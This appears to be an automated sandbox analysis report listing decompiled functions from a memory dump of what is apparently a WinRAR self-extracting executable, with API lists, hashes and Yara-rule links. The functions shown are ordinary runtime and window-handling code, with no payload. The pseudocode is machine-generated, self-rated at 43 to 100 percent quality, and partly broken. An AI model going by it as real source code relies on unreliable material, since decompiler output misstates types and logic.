                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 012295B5, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 43%
                                                                                                                                                    			E012295B5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E012292A4(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L0123340E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E01236F4C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0x1271108(0,  *0x1271154(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0x1271110( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0x1271118(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0x1271154(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0x127110c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E0122939C(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L0123340E(_t65);
							}
						}
					}
				}
				return _t43;
			}














                                                                                                                                                    0x012295be
                                                                                                                                                    0x012295c2
                                                                                                                                                    0x012295c8
                                                                                                                                                    0x012295cb
                                                                                                                                                    0x012295ce
                                                                                                                                                    0x012295da
                                                                                                                                                    0x012295e3
                                                                                                                                                    0x012295e8
                                                                                                                                                    0x012295ed
                                                                                                                                                    0x012295f3
                                                                                                                                                    0x012295f9
                                                                                                                                                    0x012295fd
                                                                                                                                                    0x012295f5
                                                                                                                                                    0x012295f5
                                                                                                                                                    0x012295f5
                                                                                                                                                    0x01229603
                                                                                                                                                    0x0122960a
                                                                                                                                                    0x01229613
                                                                                                                                                    0x0122962a
                                                                                                                                                    0x01229634
                                                                                                                                                    0x01229639
                                                                                                                                                    0x01229639
                                                                                                                                                    0x0122963f
                                                                                                                                                    0x0122964d
                                                                                                                                                    0x0122967a
                                                                                                                                                    0x01229680
                                                                                                                                                    0x01229687
                                                                                                                                                    0x012296c1
                                                                                                                                                    0x012296c3
                                                                                                                                                    0x012296c8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012296d1
                                                                                                                                                    0x01229689
                                                                                                                                                    0x0122968b
                                                                                                                                                    0x01229692
                                                                                                                                                    0x01229695
                                                                                                                                                    0x0122969c
                                                                                                                                                    0x012296a1
                                                                                                                                                    0x012296a5
                                                                                                                                                    0x012296aa
                                                                                                                                                    0x012296b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012296be
                                                                                                                                                    0x012296a5
                                                                                                                                                    0x01229695
                                                                                                                                                    0x0122968b
                                                                                                                                                    0x012296dd

                                                                                                                                                    APIs
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 012295CE
                                                                                                                                                    • GetWindowRect.USER32(?,00000000), ref: 01229613
                                                                                                                                                    • ShowWindow.USER32(?,00000005,00000000), ref: 012296AA
                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 012296B2
                                                                                                                                                    • ShowWindow.USER32(00000000,00000005), ref: 012296C8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Show$RectText
                                                                                                                                                    • String ID: RarHtmlClassName
                                                                                                                                                    • API String ID: 3937224194-1658105358
                                                                                                                                                    • Opcode ID: 584ddfbcd9bdfa6f15ab99a4c3946efb76c5cd7ae05f5f9e189c6793c9a3c54b
                                                                                                                                                    • Instruction ID: 20a0d16fff5d0a595a6b36006255abf365ed6d9db305d3c95a837237c6a77157
                                                                                                                                                    • Opcode Fuzzy Hash: 584ddfbcd9bdfa6f15ab99a4c3946efb76c5cd7ae05f5f9e189c6793c9a3c54b
                                                                                                                                                    • Instruction Fuzzy Hash: 1831DD71114220FFDB219F69EC4CB6BBFA8EF48705F004559FA499A146CB35D8A0CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0123BE84, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0123BE84(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E0123BE48(_t45, 7);
					E0123BE48(_t45 + 0x1c, 7);
					E0123BE48(_t45 + 0x38, 0xc);
					E0123BE48(_t45 + 0x68, 0xc);
					E0123BE48(_t45 + 0x98, 2);
					E0123835E( *((intOrPtr*)(_t45 + 0xa0)));
					E0123835E( *((intOrPtr*)(_t45 + 0xa4)));
					E0123835E( *((intOrPtr*)(_t45 + 0xa8)));
					E0123BE48(_t45 + 0xb4, 7);
					E0123BE48(_t45 + 0xd0, 7);
					E0123BE48(_t45 + 0xec, 0xc);
					E0123BE48(_t45 + 0x11c, 0xc);
					E0123BE48(_t45 + 0x14c, 2);
					E0123835E( *((intOrPtr*)(_t45 + 0x154)));
					E0123835E( *((intOrPtr*)(_t45 + 0x158)));
					E0123835E( *((intOrPtr*)(_t45 + 0x15c)));
					return E0123835E( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                                                                                                                                                    0x0123be8a
                                                                                                                                                    0x0123be8f
                                                                                                                                                    0x0123be98
                                                                                                                                                    0x0123bea3
                                                                                                                                                    0x0123beae
                                                                                                                                                    0x0123beb9
                                                                                                                                                    0x0123bec7
                                                                                                                                                    0x0123bed2
                                                                                                                                                    0x0123bedd
                                                                                                                                                    0x0123bee8
                                                                                                                                                    0x0123bef6
                                                                                                                                                    0x0123bf04
                                                                                                                                                    0x0123bf15
                                                                                                                                                    0x0123bf23
                                                                                                                                                    0x0123bf31
                                                                                                                                                    0x0123bf3c
                                                                                                                                                    0x0123bf47
                                                                                                                                                    0x0123bf52
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0123bf62
                                                                                                                                                    0x0123bf67

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0123BE48: _free.LIBCMT ref: 0123BE71
                                                                                                                                                    • _free.LIBCMT ref: 0123BED2
                                                                                                                                                      • Part of subcall function 0123835E: RtlFreeHeap.NTDLL(00000000,00000000,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?), ref: 01238374
                                                                                                                                                      • Part of subcall function 0123835E: GetLastError.KERNEL32(?,?,0123BE76,?,00000000,?,00000000,?,0123BE9D,?,00000007,?,?,0123C29A,?,?), ref: 01238386
                                                                                                                                                    • _free.LIBCMT ref: 0123BEDD
                                                                                                                                                    • _free.LIBCMT ref: 0123BEE8
                                                                                                                                                    • _free.LIBCMT ref: 0123BF3C
                                                                                                                                                    • _free.LIBCMT ref: 0123BF47
                                                                                                                                                    • _free.LIBCMT ref: 0123BF52
                                                                                                                                                    • _free.LIBCMT ref: 0123BF5D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 356fc02368e4ecaa91237549490116c2f84ce8f596afca7e47be9645dca2cef3
                                                                                                                                                    • Instruction ID: a95230a04ec19e7a5aecc4ef8c39cf5e25b8db10a678e538d9f50e10be643a6d
                                                                                                                                                    • Opcode Fuzzy Hash: 356fc02368e4ecaa91237549490116c2f84ce8f596afca7e47be9645dca2cef3
                                                                                                                                                    • Instruction Fuzzy Hash: 9C1193F2661B09BADA20BFB4CC05FEB77DD6F98700F840C14B3996A160DA35B5055760
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01231F1A, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                    			E01231F1A(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x124d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E0123314B(__eflags,  *0x124d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E01233185(__eflags,  *0x124d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E01238429(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E01233185(__eflags,  *0x124d680, 0);
								} else {
									__eflags = E01233185(__eflags,  *0x124d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E0123835E(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                                                                                                                                                    0x01231f21
                                                                                                                                                    0x01231f34
                                                                                                                                                    0x01231f3b
                                                                                                                                                    0x01231f3e
                                                                                                                                                    0x01231f41
                                                                                                                                                    0x01231f5a
                                                                                                                                                    0x01231f5a
                                                                                                                                                    0x01231f43
                                                                                                                                                    0x01231f43
                                                                                                                                                    0x01231f45
                                                                                                                                                    0x01231f4f
                                                                                                                                                    0x01231f55
                                                                                                                                                    0x01231f56
                                                                                                                                                    0x01231f58
                                                                                                                                                    0x01231f68
                                                                                                                                                    0x01231f6c
                                                                                                                                                    0x01231f6e
                                                                                                                                                    0x01231f82
                                                                                                                                                    0x01231f82
                                                                                                                                                    0x01231f8b
                                                                                                                                                    0x01231f70
                                                                                                                                                    0x01231f7e
                                                                                                                                                    0x01231f80
                                                                                                                                                    0x01231f94
                                                                                                                                                    0x01231f96
                                                                                                                                                    0x01231f96
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01231f80
                                                                                                                                                    0x01231f99
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01231f58
                                                                                                                                                    0x01231f45
                                                                                                                                                    0x01231fa1
                                                                                                                                                    0x01231fab
                                                                                                                                                    0x01231f23
                                                                                                                                                    0x01231f25
                                                                                                                                                    0x01231f25

                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,01231F11,0122F962), ref: 01231F28
                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 01231F36
                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01231F4F
                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,01231F11,0122F962), ref: 01231FA1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                    • Opcode ID: 628182e40931c4e95f46e4b138968677bd7cd451d8fb46e4ec9b909a899f407b
                                                                                                                                                    • Instruction ID: dc4f7384e3f310c1a99a30fa05c1e67973b09d8fa0de8a5963b24f2630ea884d
                                                                                                                                                    • Opcode Fuzzy Hash: 628182e40931c4e95f46e4b138968677bd7cd451d8fb46e4ec9b909a899f407b
                                                                                                                                                    • Instruction Fuzzy Hash: 7501F7B633E3136FE7352AB9BC885362BA4EBF1775320032DF214890D8EF5148229A54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122DAF0, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 77%
                                                                                                                                                    			E0122DAF0() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0x126fcc8;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0x126fccc = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0x126fcd0 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                                                                                                                                                    0x0122daf0
                                                                                                                                                    0x0122dafb
                                                                                                                                                    0x0122db03
                                                                                                                                                    0x0122db15
                                                                                                                                                    0x0122db19
                                                                                                                                                    0x0122db25
                                                                                                                                                    0x0122db2d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122db2f
                                                                                                                                                    0x0122db35
                                                                                                                                                    0x0122db3a
                                                                                                                                                    0x0122db42
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122db44
                                                                                                                                                    0x0122db44
                                                                                                                                                    0x0122db44
                                                                                                                                                    0x0122db42
                                                                                                                                                    0x0122db1b
                                                                                                                                                    0x0122db1b
                                                                                                                                                    0x0122db1b
                                                                                                                                                    0x0122db1b
                                                                                                                                                    0x0122db52
                                                                                                                                                    0x0122db58
                                                                                                                                                    0x0122db60
                                                                                                                                                    0x0122db66
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122db62
                                                                                                                                                    0x0122db62
                                                                                                                                                    0x0122db62
                                                                                                                                                    0x0122db62
                                                                                                                                                    0x0122db6a
                                                                                                                                                    0x0122db05
                                                                                                                                                    0x0122db08
                                                                                                                                                    0x0122db08
                                                                                                                                                    0x0122dafd
                                                                                                                                                    0x0122db00
                                                                                                                                                    0x0122db00

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                    • API String ID: 0-1718035505
                                                                                                                                                    • Opcode ID: 1d818b976349853b0a0bd310803b6db97d59a3d6a984e788533936a93d7d9e88
                                                                                                                                                    • Instruction ID: 87391b5edec2f2c2d95607df2134dd7df1d7ef7a81112c52dbddfa4a86b4664a
                                                                                                                                                    • Opcode Fuzzy Hash: 1d818b976349853b0a0bd310803b6db97d59a3d6a984e788533936a93d7d9e88
                                                                                                                                                    • Instruction Fuzzy Hash: 1401FF3A771237BB5F31ADFE7CF9AAF2788AA02552310502AEB01D3294FA11C044D7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01220C1E, Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E01220C1E(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				struct _FILETIME _v28;
				struct _SYSTEMTIME _v44;
				struct _SYSTEMTIME _v60;
				struct _SYSTEMTIME _v76;
				intOrPtr _t47;
				intOrPtr _t61;
				intOrPtr* _t66;
				long _t72;
				intOrPtr _t73;
				intOrPtr* _t76;

				_t73 = __edx;
				_t66 = _a4;
				_t76 = __ecx;
				_v44.wYear =  *_t66;
				_t3 = _t66 + 4; // 0x8b550004
				_v44.wMonth =  *_t3;
				_t5 = _t66 + 8; // 0x48ec83ec
				_v44.wDay =  *_t5;
				_t7 = _t66 + 0xc; // 0x85d8b53
				_v44.wHour =  *_t7;
				_t9 = _t66 + 0x10; // 0xf18b5756
				_v44.wMinute =  *_t9;
				_t11 = _t66 + 0x14; // 0x66038b66
				_v44.wSecond =  *_t11;
				_v44.wMilliseconds = 0;
				_v44.wDayOfWeek = 0;
				if(SystemTimeToFileTime( &_v44,  &_v20) == 0) {
					 *_t76 = 0;
					 *((intOrPtr*)(_t76 + 4)) = 0;
				} else {
					if(E0121AC35() >= 0x600) {
						FileTimeToSystemTime( &_v20,  &_v60);
						__imp__TzSpecificLocalTimeToSystemTime(0,  &_v60,  &_v76);
						SystemTimeToFileTime( &_v76,  &_v12);
						SystemTimeToFileTime( &_v60,  &_v28);
						_t61 = _v12.dwHighDateTime + _v20.dwHighDateTime;
						asm("sbb eax, [ebp-0x14]");
						asm("sbb eax, edi");
						asm("adc eax, edi");
						_t72 = 0 - _v28.dwLowDateTime + _v12.dwLowDateTime + _v20.dwLowDateTime;
						asm("adc eax, edi");
					} else {
						LocalFileTimeToFileTime( &_v20,  &_v12);
						_t61 = _v12.dwHighDateTime;
						_t72 = _v12.dwLowDateTime;
					}
					 *_t76 = E0122E620(_t72, _t61, 0x64, 0);
					 *((intOrPtr*)(_t76 + 4)) = _t73;
				}
				_t36 = _t66 + 0x18; // 0x66d84589
				_t47 =  *_t36;
				 *_t76 =  *_t76 + _t47;
				asm("adc [esi+0x4], edi");
				return _t47;
			}















                                                                                                                                                    0x01220c1e
                                                                                                                                                    0x01220c25
                                                                                                                                                    0x01220c2a
                                                                                                                                                    0x01220c2f
                                                                                                                                                    0x01220c33
                                                                                                                                                    0x01220c37
                                                                                                                                                    0x01220c3b
                                                                                                                                                    0x01220c3f
                                                                                                                                                    0x01220c43
                                                                                                                                                    0x01220c47
                                                                                                                                                    0x01220c4b
                                                                                                                                                    0x01220c4f
                                                                                                                                                    0x01220c53
                                                                                                                                                    0x01220c57
                                                                                                                                                    0x01220c5d
                                                                                                                                                    0x01220c61
                                                                                                                                                    0x01220c75
                                                                                                                                                    0x01220d07
                                                                                                                                                    0x01220d09
                                                                                                                                                    0x01220c7b
                                                                                                                                                    0x01220c87
                                                                                                                                                    0x01220ca7
                                                                                                                                                    0x01220cb6
                                                                                                                                                    0x01220cc4
                                                                                                                                                    0x01220cd2
                                                                                                                                                    0x01220cdd
                                                                                                                                                    0x01220ce2
                                                                                                                                                    0x01220ce8
                                                                                                                                                    0x01220ced
                                                                                                                                                    0x01220cef
                                                                                                                                                    0x01220cf2
                                                                                                                                                    0x01220c89
                                                                                                                                                    0x01220c91
                                                                                                                                                    0x01220c97
                                                                                                                                                    0x01220c9a
                                                                                                                                                    0x01220c9a
                                                                                                                                                    0x01220cfe
                                                                                                                                                    0x01220d00
                                                                                                                                                    0x01220d00
                                                                                                                                                    0x01220d0c
                                                                                                                                                    0x01220d0c
                                                                                                                                                    0x01220d0f
                                                                                                                                                    0x01220d11
                                                                                                                                                    0x01220d1a

                                                                                                                                                    APIs
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01220C6D
                                                                                                                                                      • Part of subcall function 0121AC35: GetVersionExW.KERNEL32(?), ref: 0121AC5A
                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,01220C18), ref: 01220C91
                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 01220CA7
                                                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 01220CB6
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,01220C18), ref: 01220CC4
                                                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 01220CD2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2092733347-0
                                                                                                                                                    • Opcode ID: 495abeb42a60c91c899295bf6ceead4bc91715f0455d47ecc5cb13d3b801c3e5
                                                                                                                                                    • Instruction ID: 5d055e110cdfc080e4862c9af1c5009eb26ac05aa988de31d6561fc8c44f2ef3
                                                                                                                                                    • Opcode Fuzzy Hash: 495abeb42a60c91c899295bf6ceead4bc91715f0455d47ecc5cb13d3b801c3e5
                                                                                                                                                    • Instruction Fuzzy Hash: CD31F97A91020AEBCB10DFE5D8849EFBBBDFF68700B04455AE915E3204E7309545CB68
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 01229110, Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                    			E01229110(signed int _a4, intOrPtr _a8, signed int* _a12) {
				void* _t17;
				signed int _t23;
				void* _t26;
				signed int _t32;
				signed int* _t36;

				_t36 = _a12;
				if(_t36 != 0) {
					_t34 = _a8;
					_t26 = 0x10;
					if(E0122FC4A(_a8, 0x124438c, _t26) == 0) {
						L13:
						_t32 = _a4;
						 *_t36 = _t32;
						L14:
						 *0x1242260(_t32);
						 *((intOrPtr*)( *((intOrPtr*)( *_t32 + 4))))();
						_t17 = 0;
						L16:
						return _t17;
					}
					if(E0122FC4A(_t34, 0x12443cc, _t26) != 0) {
						if(E0122FC4A(_t34, 0x12443ac, _t26) != 0) {
							if(E0122FC4A(_t34, 0x124437c, _t26) != 0) {
								if(E0122FC4A(_t34, 0x124441c, _t26) != 0) {
									if(E0122FC4A(_t34, 0x124436c, _t26) != 0) {
										 *_t36 =  *_t36 & 0x00000000;
										_t17 = 0x80004002;
										goto L16;
									}
									goto L13;
								}
								_t32 = _a4;
								_t23 = _t32 + 0x10;
								L11:
								asm("sbb ecx, ecx");
								 *_t36 =  ~_t32 & _t23;
								goto L14;
							}
							_t32 = _a4;
							_t23 = _t32 + 0xc;
							goto L11;
						}
						_t32 = _a4;
						_t23 = _t32 + 8;
						goto L11;
					}
					_t32 = _a4;
					_t23 = _t32 + 4;
					goto L11;
				}
				return 0x80004003;
			}








                                                                                                                                                    0x01229114
                                                                                                                                                    0x01229119
                                                                                                                                                    0x01229127
                                                                                                                                                    0x0122912c
                                                                                                                                                    0x0122913e
                                                                                                                                                    0x012291cd
                                                                                                                                                    0x012291cd
                                                                                                                                                    0x012291d0
                                                                                                                                                    0x012291d2
                                                                                                                                                    0x012291da
                                                                                                                                                    0x012291e0
                                                                                                                                                    0x012291e2
                                                                                                                                                    0x012291ee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012291ef
                                                                                                                                                    0x01229155
                                                                                                                                                    0x01229170
                                                                                                                                                    0x0122918b
                                                                                                                                                    0x012291a6
                                                                                                                                                    0x012291cb
                                                                                                                                                    0x012291e6
                                                                                                                                                    0x012291e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012291e9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012291cb
                                                                                                                                                    0x012291a8
                                                                                                                                                    0x012291ab
                                                                                                                                                    0x012291ae
                                                                                                                                                    0x012291b2
                                                                                                                                                    0x012291b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012291b6
                                                                                                                                                    0x0122918d
                                                                                                                                                    0x01229190
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229190
                                                                                                                                                    0x01229172
                                                                                                                                                    0x01229175
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01229175
                                                                                                                                                    0x01229157
                                                                                                                                                    0x0122915a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122915a
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _memcmp
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2931989736-0
                                                                                                                                                    • Opcode ID: c051d36e42ac456934d79ce35097358841784802980c1dd1c4284f807845e96c
                                                                                                                                                    • Instruction ID: 9c4a298c5340cc9f297724268152085eaa0275da633a45a5110d2a50e9e39724
                                                                                                                                                    • Opcode Fuzzy Hash: c051d36e42ac456934d79ce35097358841784802980c1dd1c4284f807845e96c
                                                                                                                                                    • Instruction Fuzzy Hash: 7021B27162413BBBDB08AE16CD85F7F77ADAB54A48F20812CFD049B202E270DD8187A0
